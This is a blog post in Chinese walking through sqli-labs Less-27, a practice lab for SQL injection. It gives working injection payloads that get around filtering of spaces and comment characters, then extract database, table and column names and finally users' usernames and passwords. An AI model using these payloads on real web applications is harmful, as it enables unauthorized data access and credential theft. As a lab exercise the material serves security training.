zoukankan      html  css  js  c++  java
  • Less-27

    0x01 判断注入点

    单引号字符型,过滤掉了#,--,空格等字符

    ?id=1'%26%26'1'='1
    #%26为&
    

    成功闭合

    0x02 判断数据库名

    ?id=1234'/*%0a*/UnIoN/*%0a*/SeLeCt/*%0a*/2,database(),4/*%0a*/||/*%0a*/'1'='1
    #使用/*%0a*/强行制造空格,unionselect随机大小写绕过
    

    0x03 判断表名

    ?id=1234'/*%0a*/UnIoN/*%0a*/SeLeCt/*%0a*/2,(SeleCt/*%0a*/group_concat(table_name)/*%0a*/from/*%0a*/information_schema.tables/*%0a*/where/*%0a*/table_schema='security'),4/*%0a*/||/*%0a*/'1'='1
    

    0x03 判断列名

    ?id=1234'/*%0a*/UnIoN/*%0a*/SeLeCt/*%0a*/2,(SeleCt/*%0a*/group_concat(column_name)/*%0a*/from/*%0a*/information_schema.columns/*%0a*/where/*%0a*/table_schema='security'/*%0a*/%26%26/*%0a*/table_name='users'),4/*%0a*/||/*%0a*/'1'='1
    

    0x04 得到数据

    ?id=1234'/*%0a*/UnIoN/*%0a*/SeLeCt/*%0a*/2,(SeleCt/*%0a*/group_concat(username,password)/*%0a*/from/*%0a*/users),4/*%0a*/||/*%0a*/'1'='1
    

  • 相关阅读:
    explicit for ctors taking more than one argument
    Python 的 encode 和 decode
    Tripwire配置和运行
    man twadmin
    Tripwire策略说明
    Tripwire安装
    [部分翻译] tripwire(8)
    snort-2.9.3.1安装
    [转载] snort中文手册
    wireshark_1.2.11安装
  • 原文地址:https://www.cnblogs.com/observering/p/13728275.html
Copyright © 2011-2022 走看看